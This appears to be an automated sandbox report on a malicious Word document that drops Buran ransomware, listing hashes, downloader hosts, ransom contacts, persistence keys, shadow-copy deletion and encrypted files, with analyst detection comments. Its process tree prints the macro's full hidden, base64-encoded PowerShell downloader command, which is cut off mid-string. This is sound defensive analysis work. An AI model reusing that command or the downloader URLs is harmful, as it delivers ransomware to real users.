Analysis
max time kernel: 148s
max time network: 148s
platform: windows10_x64
resource: win10v20201028
submitted: 04-11-2020 11:34
Static task: static1
Behavioral task: behavioral1 (sample Delivery-77426522.doc, resource win7v20201028)
Behavioral task: behavioral2 (sample Delivery-77426522.doc, resource win10v20201028)
General
Target: Delivery-77426522.doc
Size: 118KB
MD5: 29584bef6e963b191cb0a900a75585db
SHA1: 3c298a6f35cfdf61fc271a8cad59ea84b827335f
SHA256: 0f81f4eb37083c821598ffd57cff12a082f19ca2de57c86faff65755ef332686
SHA512: c4084c658ade731ee3dae206b75ec47cb488c21b95963375a9ad8b016585b5f046c1e635fc65c57f271d99f6a0b0804998056e386c774775b5259a0f00ae8350
Malware Config
Extracted (downloader URL list carried in the encoded PowerShell command shown in the process tree below; the sandbox lists only the hosts):
http://vidrioindustrial.com/
http://forcecareer.com/
http://onw.kx1.in/
http://hos365llc.com/
http://testwebsite.taxauctioninvestors.com/
http://shradhajewellers.com/
https://educationmillion.com/
http://geozone.at/
Extracted (ransom note C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT):
family: buran
contact: kassmaster@danwin1210.me
contact: kassmaster@tutanota.com
Signatures
Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | pid: 2100 | pid_target: 3508 | process: cmd.exe
  The macro launched cmd.exe through WMI (Win32_Process.Create), so the child is parented by the WMI provider host rather than by WINWORD.EXE; any detection that keys only on Office-to-cmd parent/child pairs misses this chain.
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Blacklisted process makes network request (1 IoC)
Processes:
  flow 26: powershell.exe (pid 3852)
Executes dropped EXE (5 IoCs)
Processes:
  pid 2164: Bw99ofg.exe
  pid 980: 15sp.exe
  pid 3704: mesager43.exe
  pid 3692: svchost.exe
  pid 1796: svchost.exe (second instance of the dropped copy; not visible in the truncated tree below)
Modifies extensions of user files (2 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes: svchost.exe
  File opened for modification: C:\Users\Admin\Pictures\FindSuspend.tiff
  File opened for modification: C:\Users\Admin\Pictures\SkipUnblock.tiff
UPX packed file (5 IoCs, YARA rule: upx)
Processes:
  C:\ssd\onset\mesager43.exe (matched twice)
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe (matched three times)
Adds Run key to start application (2 TTPs, 2 IoCs)
Processes: mesager43.exe
  Key created: \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run
  Set value (str): \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\svchost.exe\" -start"
  Both the value name and the drop path are chosen to blend in with the real service host; a genuine svchost.exe only runs from System32 or SysWOW64, so an svchost.exe image under a user profile is a reliable hunt query on its own.
Enumerates connected drives (3 TTPs, 24 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes: svchost.exe
  File opened (read-only), in logged order: \??\P: \??\F: \??\E: \??\Z: \??\Y: \??\X: \??\T: \??\Q: \??\B: \??\K: \??\I: \??\G: \??\V: \??\R: \??\O: \??\N: \??\L: \??\A: \??\H: \??\W: \??\U: \??\S: \??\M: \??\J:
  Every letter except C: and D: is probed, the usual pattern for an encryptor looking for mapped network shares and removable media.
Legitimate hosting services abused for malware hosting/C2 (1 TTP)
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow 30: geoiptool.com
Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
  These keys are written by the Volume Shadow Copy service itself while it enumerates its writers to satisfy the wmic shadowcopy delete request in the tree below; they are a side effect of that request, not direct registry modification by the malware.
Drops file in Program Files directory (24122 IoCs; the 64 below are the subset shown)
Processes: svchost.exe
Entries ending in .2BE-C57-121 are files that have already been renamed after encryption (the suffix is the victim ID Buran appends); the two File created entries are the per-directory ransom note. Files without the suffix were opened for modification but had not yet been renamed when logged.
  File opened for modification: C:\Program Files\7-Zip\Lang\th.txt.2BE-C57-121
  File opened for modification: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png.2BE-C57-121
  File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSmallTile.scale-100.png
  File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\Images\Ratings\Yelp9.scale-100.png
  File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-tw\ui-strings.js.2BE-C57-121
  File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\text_2x.png.2BE-C57-121
  File opened for modification: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\msjet.xsl
  File opened for modification: C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\CoreEngine.winmd
  File opened for modification: C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNotePageLargeTile.scale-200.png
  File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ca-es\ui-strings.js
  File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
  File opened for modification: C:\Program Files\Java\jdk1.8.0_66\db\3RDPARTY.2BE-C57-121
  File opened for modification: C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml
  File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-black_targetsize-64.png
  File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\selector.js
  File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019MSDNR_Retail-pl.xrm-ms
  File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\bell_empty.png.2BE-C57-121
  File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\af_get.svg.2BE-C57-121
  File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ru-ru\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
  File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf.2BE-C57-121
  File opened for modification: C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-80.png.2BE-C57-121
  File opened for modification: C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\HintBarEllipses.16.GrayF@3x.png
  File opened for modification: C:\Program Files\VideoLAN\VLC\lua\modules\dkjson.luac.2BE-C57-121
  File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\WorldClockSmallTile.contrast-black_scale-100.png
  File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\ui-strings.js
  File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon.png
  File opened for modification: C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Autumn\autumn_12s.png
  File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Comments.aapp
  File opened for modification: C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyoptionaltools.jar
  File opened for modification: C:\Program Files\Java\jdk1.8.0_66\include\win32\jni_md.h.2BE-C57-121
  File opened for modification: C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml
  File opened for modification: C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-180.png
  File opened for modification: C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-checkmark@4x.png
  File opened for modification: C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Assets\Fonts\MsgMDL2.ttf
  File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-sl\ui-strings.js.2BE-C57-121
  File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\pt-br\ui-strings.js
  File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\VisioStdR_OEM_Perp-ul-oob.xrm-ms
  File opened for modification: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\contrast-black\LargeTile.scale-125.png
  File opened for modification: C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\9.jpg
  File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\MapsSmallTile.scale-100.png
  File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pt-br\ui-strings.js.2BE-C57-121
  File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Grace-ul-oob.xrm-ms
  File opened for modification: C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\HintBarEllipses.16.GrayF@3x.png.2BE-C57-121
  File opened for modification: C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionGroupMedTile.scale-200.png
  File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\he-il\ui-strings.js.2BE-C57-121
  File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_ja_4.4.0.v20140623020002.jar
  File opened for modification: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\contrast-black\SplashScreen.scale-125_contrast-black.png
  File opened for modification: C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\bandit.png
  File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\s_thumbnailview_18.svg.2BE-C57-121
  File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial5-ppd.xrm-ms.2BE-C57-121
  File opened for modification: C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART1.BDR
  File opened for modification: C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART8.BDR.2BE-C57-121
  File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Place\contrast-black\MedTile.scale-100.png
  File opened for modification: C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Microsoft.Xbox.NetworkTroubleshooter.winmd
  File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_KMS_Client-ul-oob.xrm-ms
  File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_Subscription-pl.xrm-ms.2BE-C57-121
  File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\ui-strings.js
  File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\he-il\ui-strings.js.2BE-C57-121
  File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Trial-pl.xrm-ms.2BE-C57-121
  File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_Subscription-ppd.xrm-ms
  File opened for modification: C:\Program Files\Microsoft Office\root\Office16\1033\offsymt.ttf
  File opened for modification: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\SmallLogo.scale-125.png
  File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\ui-strings.js.2BE-C57-121
  File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hr-hr\ui-strings.js
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes: WINWORD.EXE
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
  Office reads these values on every start, so from WINWORD.EXE itself this is low signal; it would matter coming from the dropped executables.
Delays execution with timeout.exe (4 IoCs)
Processes: timeout.exe (pids 2880, 3468, 3836, 3148)
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes: WINWORD.EXE
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
Interacts with shadow copies (2 TTPs, 2 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes: vssadmin.exe (pids 1620, 2496; these invocations fall outside the truncated tree below, which ends at the wmic and bcdedit commands)
Kills process with taskkill (2 IoCs)
Processes: taskkill.exe (pids 3424, 3024)
Modifies registry class (2 IoCs)
Processes:
  Key created: \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings (Bw99ofg.exe)
  Key created: \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings (cmd.exe)
  Creation of the per-user _Classes\Local Settings key is routine shell activity and carries little signal on its own.
Modifies system certificate store (2 IoCs)
Processes: mesager43.exe
  Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349
  Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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
  AuthRoot\Certificates entries are normally written by the Windows automatic root-certificate update when a process validates a TLS chain whose root is not yet cached locally, so on its own this is a side effect of the outbound connection rather than proof of a rogue CA install. Check the blob's thumbprint against the Microsoft trusted root list before treating it as an IoC.
Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes: WINWORD.EXE (pid 644, twice)
Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes: powershell.exe (pid 3852, three times)
Suspicious use of AdjustPrivilegeToken (94 IoCs; a truncated subset is shown)
Processes and privileges enabled:
  powershell.exe (pid 3852): SeDebugPrivilege
  mesager43.exe (pid 3704): SeDebugPrivilege (twice)
  taskkill.exe (pids 3424, 3024): SeDebugPrivilege
  WMIC.exe (pids 984, 2740), each logged repeatedly: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  vssvc.exe (pid 2228): SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
  WMIC.exe enabling every privilege available to its token is its normal start-up behaviour; the signal here is the command line it was given (wmic shadowcopy delete), not the privilege set. SeDebugPrivilege in powershell.exe, mesager43.exe and taskkill.exe is what allows them to open and terminate other users' processes.
Suspicious use of SetWindowsHookEx (7 IoCs)
Processes: WINWORD.EXE (pid 644, seven times)
Suspicious use of WriteProcessMemory (94 IoCs; a truncated subset is shown, grouped here by writer and target with repeat counts)
Processes:
  cmd.exe (2100) -> msg.exe (2716) x2
  cmd.exe (2100) -> powershell.exe (3852) x2
  Bw99ofg.exe (2164) -> WScript.exe (3252) x3
  WScript.exe (3252) -> cmd.exe (2092) x3
  cmd.exe (2092) -> 15sp.exe (980) x3
  cmd.exe (2092) -> timeout.exe (3148) x3
  cmd.exe (2092) -> WScript.exe (1168) x3
  cmd.exe (2092) -> timeout.exe (2880) x3
  WScript.exe (1168) -> cmd.exe (2532) x3
  cmd.exe (2532) -> attrib.exe (3680) x3
  cmd.exe (2532) -> timeout.exe (3468) x3
  cmd.exe (2532) -> mesager43.exe (3704) x3
  mesager43.exe (3704) -> svchost.exe (3692) x3
  mesager43.exe (3704) -> notepad.exe (3364) x6
  cmd.exe (2532) -> taskkill.exe (3424) x3
  cmd.exe (2532) -> taskkill.exe (3024) x3
  cmd.exe (2532) -> attrib.exe (2172) x3
  cmd.exe (2532) -> timeout.exe (3836) x3
  svchost.exe (3692) -> cmd.exe (3992) x3
  svchost.exe (3692) -> cmd.exe (2304) x3
  svchost.exe (3692) -> cmd.exe (3780) x3
  Two or three writes from a parent into a child it has just created are what CreateProcess itself produces and are not suspicious. The outlier is mesager43.exe writing six times into notepad.exe (pid 3364), a process that does not appear anywhere else in this report: that target deserves a memory dump and a check for injected code, since the visible tree is truncated and does not show what notepad.exe went on to do.
Views/modifies file attributes (1 TTP, 2 IoCs)
Processes: attrib.exe (pids 3680, 2172)
Processes
[depth 1] C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Delivery-77426522.doc" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
[depth 1] C:\Windows\system32\cmd.exe (parent is wmiprvse.exe, see the first signature above; there is no parent link back to WINWORD.EXE)
  command line: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  The msg.exe call is a decoy: the fake "Word experienced an error" pop-up gives the user a reason the document appeared blank while the PowerShell downloader runs hidden.
  [depth 2] C:\Windows\system32\msg.exe
    command line: msg Admin /v Word experienced an error trying to open the file.
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOwersheLL -w hidden -ENCOD IAAkADQANwB6AHUAMwAgACAAPQAgACAAWwB0AHkAUABFAF0AKAAiAHsAMgB9AHsAMQB9AHsAMwB9AHsAMAB9ACIAIAAtAGYAIAAnAHQATwBSAHkAJwAsACcAZQBtAC4AaQBPAC4ARAAnACwAJwBzAHkAUwBUACcALAAnAGkAUgBFAEMAJwApACAAIAA7ACAAIAAgAHMARQB0ACAAIABOAGgAdABNACAAIAAoAFsAdABZAHAARQBdACgAIgB7ADQAfQB7ADIAfQB7ADUAfQB7ADkAfQB7ADcAfQB7ADEAfQB7ADAAfQB7ADYAfQB7ADgAfQB7ADMAfQAiACAALQBGACAAJwBlACcALAAnAHMAJwAsACcAZQAnACwAJwBOAEEAZwBlAFIAJwAsACcAcwBZAFMAdAAnACwAJwBtAC4AbgAnACwAJwBSAHYASQBDAEUAUABPAEkATgAnACwAJwBUAC4AJwAsACcAdABNAEEAJwAsACcARQAnACkAIAApACAAIAA7ACQAQgBmAG8AeABnAGEAMAA9ACgAJwBRACcAKwAoACcAdwBuAHkAOAAnACsAJwA4ADQAJwApACkAOwAkAFcAdwBwAHAANQA0AHgAPQAkAEIAYQAyAHIAZAA5ADgAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEIAMQBoAGsAdgAyAG0AOwAkAFEAdABuAHkAbwBfAHcAPQAoACcATABpACcAKwAoACcAYwA4AHkAJwArACcAMQAnACkAKwAnAHkAJwApADsAIAAgACQANAA3AHoAVQAzADoAOgAiAGMAYABSAEUAQQBUAGAAZQBgAEQAaQByAGAARQBDAFQATwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAHIAaQBHAFcAbwBpACcAKwAnADEAJwArACcAcwAnACsAJwBhACcAKQArACgAJwBvAHIAJwArACcAaQAnACkAKwAoACcARwAnACsAJwBNAGYAJwApACsAJwAzAG8AJwArACcAZwBoACcAKwAoACcAXwAnACsAJwByAGkARwAnACkAKQAuACIAUgBFAGAAUABsAEEAQwBFACIAKAAoAFsAQwBoAEEAUgBdADEAMQA0ACsAWwBDAGgAQQBSAF0AMQAwADUAKwBbAEMAaABBAFIAXQA3ADEAKQAsACcAXAAnACkAKQApADsAJABKAHkAbQBnAHIAcwA0AD0AKAAoACcARwAnACsAJwBrAHYAJwApACsAJwByADUAJwArACcAeQBwACcAKQA7ACAAKAAgAGcASQAgACAAVgBBAFIAaQBhAGIAbABlADoAbgBIAHQATQAgACkALgBWAEEATAB1AGUAOgA6ACIAcwBlAEMAVQBgAFIAaQBUAGAAeQBwAFIAYABPAFQAYABvAEMATwBsACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABIADEAYgBvAHUAZQAxAD0AKAAoACcASwAnACsAJwA3AGIANgAnACkAKwAoACcANgBfACcAKwAnAHIAJwApACkAOwAkAFgAegA0AHgANgBsAHgAIAA9ACAAKAAoACcAQgAnACsAJwB3ADkAJwApACsAKAAnADkAbwAnACsAJwBmACcAKQArACcAZwAnACkAOwAkAFQAaQBwAGUAbwBmAGIAPQAoACgAJwBVAGYAJwArACcAeAA5ACcAKQArACcAegAnACsAJwBrAGIAJwApADsAJABZAGoAMwB2AHEAOQBrAD0AKAAnAFYAJwArACgAJwBpAHAAaAAnACsAJwAxAHMAJwArACcAcwAnACkAKQA7ACQASgAzAGUAaABrAG0AbQA9ACQASABPAE0ARQArACgAKAAnAHsAMAB
9AFcAbwBpACcAKwAnADEAcwBhAG8AewAwACcAKwAnAH0ATQBmADMAbwBnACcAKwAnAGgAXwAnACsAJwB7ADAAfQAnACkAIAAgAC0AZgAgACAAWwBjAGgAYQByAF0AOQAyACkAKwAkAFgAegA0AHgANgBsAHgAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABPADgAeABsADEAdwB6AD0AKAAnAFYAJwArACgAJwBqACcAKwAnAGMAMQBtACcAKwAnAHQAeQAnACkAKQA7ACQARwB1ADMAdwByAHgAaQA9AG4ARQB3AC0ATwBCAGAAagBgAGUAQwBUACAATgBlAFQALgB3AGUAQgBjAEwASQBlAG4AVAA7ACQAWAA1ADMAeQBjAF8ANgA9ACgAKAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKwAnADoAJwArACgAKAAnACkAKAAnACkAKQArACgAKAAnACkAVwAnACkAKQArACgAKAAnAE4AKQAnACsAJwAoACkAKAAnACkAKQArACcAKQAnACsAKAAoACcAVwAnACsAJwBOACkAJwApACkAKwAoACgAJwAoAHYAJwApACkAKwAoACcAaQBkACcAKwAnAHIAaQBvAGkAbgAnACkAKwAnAGQAJwArACcAdQAnACsAJwBzAHQAJwArACgAJwByACcAKwAnAGkAYQBsAC4AJwApACsAJwBjACcAKwAoACgAJwBvAG0AKQAnACsAJwAoACkAJwApACkAKwAoACgAJwBXACcAKwAnAE4AKQAnACkAKQArACcAKAAnACsAKAAnAGgANgBtAGsAZwAnACsAJwByAC4AJwApACsAKAAnAHIAJwArACcAYQByAEAAJwApACsAJwBoAHQAJwArACcAdAAnACsAKAAoACcAcAA6ACcAKwAnACkAKAApACcAKwAnAFcATgApACgAKQAoACcAKQApACsAKAAoACcAKQAnACsAJwBXAE4AKQAnACkAKQArACgAKAAnACgAZgAnACkAKQArACgAJwBvAHIAYwBlACcAKwAnAGMAJwArACcAYQAnACkAKwAoACcAcgAnACsAJwBlAGUAJwApACsAJwByAC4AJwArACcAYwBvACcAKwAnAG0AJwArACcAKQAnACsAKAAoACcAKAApAFcAJwArACcATgApACcAKQApACsAJwAoACcAKwAoACcAZQAnACsAJwBmAGYAJwApACsAKAAnAG8AOAAnACsAJwB5ACcAKQArACcAdQAnACsAKAAnAC4AcgAnACsAJwBhAHIAJwApACsAKAAnAEAAJwArACcAaAB0AHQAJwApACsAJwBwADoAJwArACgAKAAnACkAKAApAFcATgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwApACgAKQBXAE4AJwArACcAKQAoAG8AJwArACcAbgAnACkAKQArACcAdwAuACcAKwAnAGsAJwArACcAeAAxACcAKwAnAC4AaQAnACsAKAAoACcAbgApACcAKQApACsAKAAoACcAKAApAFcAJwArACcATgApACcAKQApACsAKAAoACcAKABkAGEAJwArACcAdgA0ADMAYQA1ACcAKwAnAGsAcQAnACkAKQArACgAJwAuACcAKwAnAHIAYQByACcAKQArACcAQABoACcAKwAnAHQAJwArACcAdAAnACsAKAAoACcAcAA6ACkAJwArACcAKAAnACkAKQArACgAKAAnACkAVwAnACsAJwBOACkAKAAnACsAJwApACgAJwApACkAKwAoACgAJwApAFcATgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwBoAG8AcwAzADYANQBsACcAKQApACsAKAAoACcAbAAnACsAJwBjAC4AYwBvAG0AKQAoACkAJwApACkAKwAnAFcATgAnACsAKAAoACcAKQAoACcAKQApACsAJwBoAGMAJwArACgAJwB
pACcAKwAnADAAeABuACcAKQArACcAMAAnACsAKAAnAC4AegBpACcAKwAnAHAAQABoAHQAdAAnACkAKwAoACgAJwBwADoAKQAnACsAJwAoACkAVwAnACkAKQArACgAKAAnAE4AKQAnACkAKQArACgAKAAnACgAKQAnACsAJwAoACcAKQApACsAKAAoACcAKQBXACcAKQApACsAKAAoACcATgApACcAKQApACsAKAAoACcAKAB0ACcAKwAnAGUAcwB0ACcAKQApACsAKAAnAHcAJwArACcAZQBiACcAKQArACgAJwBzAGkAdABlACcAKwAnAC4AdABhACcAKwAnAHgAYQAnACsAJwB1AGMAJwApACsAKAAnAHQAaQAnACsAJwBvAG4AJwApACsAJwBpACcAKwAnAG4AdgAnACsAJwBlACcAKwAnAHMAJwArACgAJwB0AG8AcgAnACsAJwBzACcAKQArACgAKAAnAC4AYwAnACsAJwBvAG0AKQAoACkAJwArACcAVwBOACkAJwApACkAKwAoACgAJwAoAHgAJwArACcAdQBnACcAKQApACsAKAAnAGkAbgAnACsAJwAzACcAKQArACgAJwBxAHUALgB6AGkAJwArACcAcAAnACkAKwAnAEAAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwApACgAKQAnACkAKQArACcAVwAnACsAKAAoACcATgApACgAKQAoACkAJwArACcAVwBOACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAJwArACcAaAByAGEAZABoAGEAJwApACkAKwAnAGoAJwArACgAJwBlACcAKwAnAHcAZQBsAGwAJwApACsAJwBlACcAKwAoACgAJwByAHMALgBjACcAKwAnAG8AbQApACcAKQApACsAKAAnACgAJwArACcAKQBXACcAKQArACgAKAAnAE4AKQAoACcAKwAnAHUAJwApACkAKwAoACcAMAAnACsAJwA1AGcAJwApACsAJwBxACcAKwAoACcAMQBqACcAKwAnAGoAJwApACsAKAAoACcALgByACcAKwAnAGEAcgBAAGgAdAB0AHAAcwA6ACcAKwAnACkAKAAnACkAKQArACgAKAAnACkAJwArACcAVwBOACkAJwApACkAKwAoACcAKAApACcAKwAnACgAKQAnACkAKwAnAFcATgAnACsAJwApACcAKwAoA